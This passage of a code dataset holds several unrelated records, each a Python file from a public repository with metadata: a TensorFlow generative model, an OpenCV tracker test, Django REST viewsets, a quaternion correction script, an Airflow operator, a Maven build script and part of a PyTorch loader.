0.5*(delta**2)*energy\n i += 1\n return z, Y, i\n \n cond = lambda z, Y, i: tf.less(i, self.sample_steps)\n body = lambda z, Y, i: step(z, Y, i)\n \n with tf.name_scope(\"langevin\"):\n i = tf.constant(0)\n output, _, _ = tf.while_loop(cond, body, [z, Y, i])\n \n return output\n\n\n def build_model(self):\n ####################################################\n # Define the learning process. Record the loss.\n ####################################################\n \n self.train_z = self.generator(self.z, reuse = False)\n self.gen_z = self.generator(self.z, reuse = True)\n \n # loss\n self.train_loss = tf.reduce_sum(0.5/(self.sigma**2)*tf.norm(self.real_image - self.train_z, ord=2, axis=0) )\n \n self.sampler = self.langevin_dynamics(self.z, self.real_image)\n \n # optimizer\n self.vars = [var for var in tf.trainable_variables() if 'gen' in var.name]\n self.optim = tf.train.AdamOptimizer(self.g_lr, beta1=self.beta1).minimize(self.train_loss, var_list=self.vars)\n \n \n\n def train(self):\n # Prepare training data\n train_data = DataSet(self.data_path, image_size=self.image_size)\n train_data = train_data.to_range(-1, 1)\n\n num_batches = int(math.ceil(len(train_data) / self.batch_size))\n summary_op = tf.summary.merge_all()\n\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n\n saver = tf.train.Saver(max_to_keep=50)\n writer = tf.summary.FileWriter(self.log_dir, self.sess.graph)\n self.sess.graph.finalize()\n\n print('Start training ...')\n\n ####################################################\n # Train the model here. Print the loss term at each\n # epoch to monitor the training process. You may use\n # save_images() in ./datasets.py to save images. At\n # each log_step, record model in self.model_dir,\n # reconstructed images and synthesized images in\n # self.sample_dir, loss in self.log_dir (using writer).\n ####################################################\n data_len = train_data.shape[0]\n \n t_loss_log = []\n counter = 0\n sample = np.zeros((self.batch_size, self.z_dim))\n \n for epoch in range(self.num_epochs):\n batch_idxs = data_len // self.batch_size\n\n for idx in range(batch_idxs):\n counter += 1\n batch_images = train_data[idx * self.batch_size:min(data_len, (idx+1)*self.batch_size)] \n \n _, t_loss = self.sess.run([self.optim, self.train_loss], feed_dict={\n self.real_image: batch_images,\n self.z: sample})\n \n sample = self.sess.run(self.sampler, feed_dict={self.z: sample,\n self.real_image: batch_images}) \n \n t_loss_log.append(t_loss)\n \n \n if epoch % 50 == 0:\n print(\"Epoch[%2d], train_loss: %.6f\" % (epoch, t_loss))\n # recon\n recon = self.sess.run(self.gen_z, {self.z: sample})\n # random image\n z = np.random.normal(size=[64, self.z_dim])\n gen = self.sess.run(self.gen_z, {self.z: z})\n # interpolation\n grid = np.linspace(-2,2,8)\n inter_z = np.array(np.meshgrid(grid, grid)).reshape(2,-1).T\n inter = self.sess.run(self.gen_z, {self.z: inter_z})\n save_images(inter, \"%s/interpolation-%03d.png\" % (self.sample_dir, epoch))\n \n # save image\n if not os.path.exists(self.sample_dir):\n os.makedirs(self.sample_dir)\n save_images(gen, \"%s/generation-%03d.png\" % (self.sample_dir, epoch))\n save_images(recon, \"%s/reconstruction-%03d.png\" % (self.sample_dir, epoch))\n \n \n plt.plot(t_loss_log)\n plt.title('Training Loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.savefig(\"%s/loss.png\" % (self.sample_dir))\n plt.clf()\n\n", "repo_name": "Alice86/DeepLearning", "sub_path": 
"232_5_GenNet_DesNet_tensorflow/GenNet/GenNet.py", "file_name": "GenNet.py", "file_ext": "py", "file_size_in_byte": 8451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.Exists", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.DeleteRecursively", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": 
"attribute"}, {"api_name": "tensorflow.gradients", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 123, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.local_variables_initializer", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}]}
+{"seq_id": "14432528471", "text": "\"\"\"Test script for multitracking\n\nThis script is not inteded to be rigorous in software good practices\nThe script is used to learn about the OpenCV lib and in particular about the its Tracker API\n\nSource: https://www.learnopencv.com/multitracker-multiple-object-tracking-using-opencv-c-python/\n\nUsage:\n\n Open a terminal go to the source file dir and type:\n python 02_opencv-multi-tracker-test.py\n\n Select a Tracker from the list \n The video is displayed while the objects are tracked. The rendered video is generated in the same folder (out.mkv)\n\"\"\"\n\nimport sys\nimport cv2\nfrom random import randint\nimport json\n\ntrackerTypes = ['BOOSTING', 'MIL', 'KCF','TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']\n\ndef createTrackerByName(trackerType):\n # Create a tracker based on tracker name\n if trackerType == trackerTypes[0]: \n tracker = cv2.TrackerBoosting_create()\n elif trackerType == trackerTypes[1]: \n tracker = cv2.TrackerMIL_create()\n elif trackerType == trackerTypes[2]:\n tracker = cv2.TrackerKCF_create()\n elif trackerType == trackerTypes[3]:\n tracker = cv2.TrackerTLD_create()\n elif trackerType == trackerTypes[4]:\n tracker = cv2.TrackerMedianFlow_create()\n elif trackerType == trackerTypes[5]:\n tracker = cv2.TrackerGOTURN_create()\n elif trackerType == trackerTypes[6]:\n tracker = cv2.TrackerMOSSE_create()\n elif trackerType == trackerTypes[7]:\n tracker = cv2.TrackerCSRT_create()\n else:\n tracker = None\n print('Incorrect tracker name')\n print('Available trackers are:')\n for t in trackerTypes:\n print(t)\n \n return tracker\n\n\n# Select tracker\nprint(\"Tracker list:\")\nfor i, tracker in enumerate(trackerTypes):\n print( \" \" + str(i) + \" - \" + tracker)\nuser_input = input(\"Select tracker:\")\n\n# Specify the tracker type\ntrackerType = trackerTypes[int(user_input)] \n\n# Set video to load\nvideoPath = \"videos/run.mp4\"\n\n# Create a video capture object to read videos\ncap = cv2.VideoCapture(\"../../data/input.mkv\")\n\n# Define the codec and create VideoWriter object\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\nfps = cap.get(cv2.CAP_PROP_FPS)\nprint(w)\nprint(h)\nprint(fps)\nout = cv2.VideoWriter( 'out.mp4',\n cv2.VideoWriter_fourcc(*'DIVX'), #cv2.VideoWriter_fourcc('m', 'p', '4', 'v'), \n int(fps), \n (int(w), int(h))\n )\n\n# Read first frame\nsuccess, frame = cap.read()\n# quit if unable to read the video file\nif not success:\n print('Failed to read video')\n sys.exit()\n\n# Read file that contains the bounding boxes to track\njson_file = \"../../data/initial_conditions.json\"\nwith open(json_file) as f:\n initial_conditions = json.load(f)\n\n## Select boxes\nbboxes = []\ncolors = [] \n\nfor obj in initial_conditions:\n coordinates = tuple(obj[\"coordinates\"])\n bboxes.append(coordinates)\n \n color = (randint(0, 255), randint(0, 255), randint(0, 255))\n colors.append(color)\n\nprint('Selected bounding boxes {}'.format(bboxes)) \n\n# Create MultiTracker object\nmultiTracker = cv2.MultiTracker_create()\n\n# Initialize MultiTracker \nfor bbox in bboxes:\n tracker = createTrackerByName(trackerType)\n multiTracker.add(tracker, frame, bbox)\n\n# Process video and track objects\nwhile cap.isOpened():\n success, frame = cap.read()\n if not success:\n break\n \n # get updated location of objects in subsequent frames\n success, boxes = multiTracker.update(frame)\n\n # draw tracked objects\n for i, newbox in enumerate(boxes):\n p1 = (int(newbox[0]), int(newbox[1]))\n p2 = 
(int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))\n cv2.rectangle(frame, p1, p2, colors[i], 2, 1)\n\n # show frame\n cv2.imshow('MultiTracker', frame)\n \n # Save video\n out.write(frame)\n\n # quit on ESC button\n if cv2.waitKey(1) & 0xFF == 27: # Esc pressed\n break\n\n\n\n \n# Release the capture\ncap.release()\nout.release()\n", "repo_name": "alejandroviegener/ObjectTracker", "sub_path": "research/scripts/02_opencv-multi-tracker-test.py", "file_name": "02_opencv-multi-tracker-test.py", "file_ext": "py", "file_size_in_byte": 4032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.TrackerBoosting_create", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.TrackerMIL_create", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.TrackerKCF_create", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.TrackerTLD_create", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.TrackerMedianFlow_create", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.TrackerGOTURN_create", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.TrackerMOSSE_create", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.TrackerCSRT_create", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 85, "usage_type": "call"}, {"api_name": "json.load", "line_number": 90, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.MultiTracker_create", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "33306300148", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import (\n NotFound,\n PermissionDenied,\n ValidationError,\n)\n\nfrom environments.models import Environment\nfrom environments.permissions.constants import VIEW_ENVIRONMENT\nfrom projects.permissions import VIEW_PROJECT\n\n\nclass EnvironmentIntegrationCommonViewSet(viewsets.ModelViewSet):\n serializer_class = None\n pagination_class = None # set here to ensure documentation is correct\n model_class = None\n\n def get_queryset(self):\n if getattr(self, \"swagger_fake_view\", False):\n return self.model_class.objects.none()\n\n environment_api_key = self.kwargs[\"environment_api_key\"]\n\n try:\n environment = Environment.objects.get(api_key=environment_api_key)\n if not self.request.user.has_environment_permission(\n VIEW_ENVIRONMENT, environment\n ):\n raise PermissionDenied(\n \"User does not have permission to perform action in environment.\"\n )\n\n return self.model_class.objects.filter(environment=environment)\n except Environment.DoesNotExist:\n raise NotFound(\"Environment not found.\")\n\n def perform_create(self, serializer):\n environment = self.get_environment_from_request()\n\n if self.model_class.objects.filter(environment=environment).exists():\n raise ValidationError(\n f\"{self.model_class.__name__} for environment already exist.\"\n )\n\n serializer.save(environment=environment)\n\n def perform_update(self, serializer):\n environment = self.get_environment_from_request()\n serializer.save(environment=environment)\n\n def get_environment_from_request(self):\n \"\"\"\n Get environment object from URL parameters in request.\n \"\"\"\n return Environment.objects.get(api_key=self.kwargs[\"environment_api_key\"])\n\n\nclass ProjectIntegrationBaseViewSet(viewsets.ModelViewSet):\n serializer_class = None\n pagination_class = None\n model_class = None\n\n def get_queryset(self):\n if getattr(self, \"swagger_fake_view\", False):\n return self.model_class.objects.none()\n\n project = get_object_or_404(\n self.request.user.get_permitted_projects(VIEW_PROJECT),\n pk=self.kwargs[\"project_pk\"],\n )\n return self.model_class.objects.filter(project=project)\n\n def perform_create(self, serializer):\n project_id = self.kwargs[\"project_pk\"]\n if self.model_class.objects.filter(project_id=project_id).exists():\n raise ValidationError(\n f\"{self.model_class.__name__} for this project already exists.\"\n )\n serializer.save(project_id=project_id)\n\n def perform_update(self, serializer):\n project_id = self.kwargs[\"project_pk\"]\n serializer.save(project_id=project_id)\n", "repo_name": "Flagsmith/flagsmith", "sub_path": "api/integrations/common/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3272, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 14, "usage_type": "name"}, {"api_name": "environments.models.Environment.objects.get", "line_number": 26, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 26, "usage_type": "name"}, {"api_name": "environments.permissions.constants.VIEW_ENVIRONMENT", "line_number": 28, "usage_type": "argument"}, {"api_name": 
"rest_framework.exceptions.PermissionDenied", "line_number": 30, "usage_type": "call"}, {"api_name": "environments.models.Environment.DoesNotExist", "line_number": 35, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.NotFound", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 42, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "projects.permissions.VIEW_PROJECT", "line_number": 69, "usage_type": "argument"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "36555231041", "text": "import pandas\nimport matplotlib.pyplot as plt\nfrom pyquaternion import Quaternion\n\nfilename = \"/home/joshua/programming/whycode_flight_data/data_135432000000.csv\"\ndata = pandas.read_csv(filename)\n\ndata[\"inverse_orientation_w\"] = \"\"\ndata[\"inverse_orientation_x\"] = \"\"\ndata[\"inverse_orientation_y\"] = \"\"\ndata[\"inverse_orientation_z\"] = \"\"\ndata[\"is_flipped\"] = \"\"\n\n# set default orientation to be normal\nprevious_orientation = Quaternion(1, 0, 0, 0)\nfor index, row in data.iterrows():\n\n # create objects for orientation and inverse orientation\n orientation = Quaternion(row[\"orientation_w\"], row[\"orientation_x\"], row[\"orientation_y\"], row[\"orientation_z\"])\n inverse_orientation = orientation.inverse\n\n data.at[index, \"inverse_orientation_w\"] = inverse_orientation.w\n data.at[index, \"inverse_orientation_x\"] = inverse_orientation.x\n data.at[index, \"inverse_orientation_y\"] = inverse_orientation.y\n data.at[index, \"inverse_orientation_z\"] = inverse_orientation.z\n\n # determine if the orientation is assumed to be flipped\n data.at[index, \"is_flipped\"] = Quaternion.distance(inverse_orientation, previous_orientation) < 0.05\n\n # set iteration values\n if(data.at[index, \"is_flipped\"]):\n orientation = inverse_orientation\n previous_orientation = orientation\n\n data.at[index, \"corrected_orientation_w\"] = orientation.w\n data.at[index, \"corrected_orientation_x\"] = orientation.x\n data.at[index, \"corrected_orientation_y\"] = orientation.y\n data.at[index, \"corrected_orientation_z\"] = orientation.z\n\nfilename_elements = filename.split(\".\")\nnew_filename = filename_elements[0] + \"_fixed.csv\"\ndata.to_csv(new_filename)\n\nprint(\"Saved to: %s\" % new_filename)\n\n# orientation constrained\nfigure = plt.figure()\naxes = figure.gca()\nplt.title(\"Pose estimate sequence number vs. WhyCode orientation.\")\nplt.xlabel(\"Pose estimate number\")\nplt.ylabel(\"Orientation quaternion in camera frame\")\naxes.plot(data[\"orientation_x\"].iloc[500:600], label=\"X\")\naxes.plot(data[\"orientation_y\"].iloc[500:600], label=\"Y\")\naxes.plot(data[\"orientation_z\"].iloc[500:600], label=\"Z\")\naxes.plot(data[\"orientation_w\"].iloc[500:600], label=\"W\")\naxes.legend()\n\n# orientation constrained\nfigure = plt.figure()\naxes = figure.gca()\nplt.title(\"Pose estimate sequence number vs. 
corrected WhyCode orientation.\")\nplt.xlabel(\"Pose estimate number\")\nplt.ylabel(\"Orientation quaternion in camera frame\")\naxes.plot(data[\"corrected_orientation_x\"].iloc[500:600], label=\"X\")\naxes.plot(data[\"corrected_orientation_y\"].iloc[500:600], label=\"Y\")\naxes.plot(data[\"corrected_orientation_z\"].iloc[500:600], label=\"Z\")\naxes.plot(data[\"corrected_orientation_w\"].iloc[500:600], label=\"W\")\naxes.legend()\n\nplt.show()", "repo_name": "uzgit/flight_analysis", "sub_path": "whycode_orientation_fix.py", "file_name": "whycode_orientation_fix.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 15, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 19, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion.distance", "line_number": 28, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "74444363928", "text": "import os\nfrom typing import Dict\n\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nfrom helpers import (read_sql, AIRFLOW_CONNECTION_ID, CSV_Table, CSV_TABLES,\n QUERIES_PATH, SCHEMA_NAME)\n\n\nclass CSVToTableOperator(BaseOperator):\n ui_color = '#ededed'\n\n @apply_defaults\n def __init__(self,\n schema_name: str = SCHEMA_NAME,\n csv_tables: Dict[str, CSV_Table] = CSV_TABLES,\n queries_path: str = QUERIES_PATH,\n query_file: str = 'copy_csv_data.sql',\n postgres_conn_id: str = AIRFLOW_CONNECTION_ID,\n should_run: bool = True,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n task_id = str(kwargs['task_id'])\n if task_id.startswith('copy_') and task_id.endswith('_table'):\n # len('copy_') = 5; len('_table') = 6\n self.table = task_id[5:-6]\n else:\n raise ValueError(f'Invalid task_id=\"{task_id}\"')\n self.schema_name = schema_name\n self.csv_tables = csv_tables\n self.queries_path = queries_path\n self.query_file = query_file\n self.postgres_conn_id = postgres_conn_id\n self.should_run = should_run\n\n def execute(self, context):\n query_file = os.path.join(self.queries_path, self.query_file)\n self.log.info(f'Running query from file \"{query_file:s}\" into table '\n f'\"{self.schema_name:s}.{self.table}\"...')\n postgres = PostgresHook(postgres_conn_id=self.postgres_conn_id)\n csv_table = self.csv_tables[self.table]._asdict()\n for csv in csv_table['file_names']:\n sql = read_sql(query_file,\n schema_name=self.schema_name,\n **csv_table,\n file_name=csv)\n if self.should_run:\n postgres.run(sql=sql)\n self.log.info('Done!')\n else:\n self.log.info(sql)\n self.log.info('Skipping this task.')\n", "repo_name": "gcbeltramini/etl-project", "sub_path": "etl/airflow_home/plugins/operators/csv_to_table.py", "file_name": "csv_to_table.py", "file_ext": "py", "file_size_in_byte": 2149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "airflow.models.BaseOperator", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.CSV_Table", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.SCHEMA_NAME", "line_number": 17, "usage_type": "name"}, {"api_name": "helpers.CSV_TABLES", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.QUERIES_PATH", "line_number": 19, "usage_type": "name"}, {"api_name": "helpers.AIRFLOW_CONNECTION_ID", "line_number": 21, "usage_type": "name"}, {"api_name": "airflow.utils.decorators.apply_defaults", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "airflow.hooks.postgres_hook.PostgresHook", "line_number": 42, "usage_type": "call"}, {"api_name": "helpers.read_sql", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "36603419699", "text": "import sys\nimport os\n# from typing import string;\n\nimport logging\n\n\nmainLogger:logging.Logger = logging.getLogger()\n# Run python script for debugging\n\nmainLogger.info(\"-------- Begin test logging -------\")\n\nmavenCmd:str = './mvnw'\nif sys.platform == \"win32\":\n mavenCmd = '.\\mvnw'\n\nretVal = os.system(f'{mavenCmd} test') # Linux bash run\nif retVal != 0: # If failed exit code\n mainLogger.info(\"Maven Test failed, exiting...\")\n sys.exit(1)\n\nmainLogger.info(\"-------- End test logging -------\")\n\n# Build docker image\nmainLogger.info(\"-------- Begin docker build logging -------\")\nretVal = os.system(f'{mavenCmd} spring-boot:build-image -Dspring-boot.build-image.imageName=demo/payroll')\nif retVal != 0:\n mainLogger.error(\"Docker Build failed, exiting...\")\n sys.exit(1)\n\nmainLogger.info(\"-------- End docker build logging -------\")", "repo_name": "adrianAnyansi/SpringBootExercise", "sub_path": "buildScript.py", "file_name": "buildScript.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.Logger", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "2104635156", "text": "import sys, os\nsys.path.append(os.path.abspath(\"model/\"))\nsys.path.append(os.path.abspath(\"data_loader/\"))\nsys.path.append(os.path.abspath(\"base/\"))\nsys.path.append(os.path.abspath(\".\"))\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom os.path import expanduser\nfrom model import ResNet_AE\nfrom data_loaders import AcousticDataset\nimport torch\n\ndevice = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n\ndef save_sample(data, outfile):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n im = ax.imshow(data)\n ratio = 1.0\n xleft, xright = ax.get_xlim()\n ybottom, ytop = ax.get_ylim()\n \n # the abs method is used to make sure that all numbers are positive\n # because x and y axis of an axes maybe inversed.\n ax.set_aspect(abs((xright-xleft)/(ybottom-ytop))*ratio)\n fig.colorbar(im)\n \n # or we can utilise the get_data_ratio method which is more concise\n # ax.set_aspect(1.0/ax.get_data_ratio()*ratio)\n 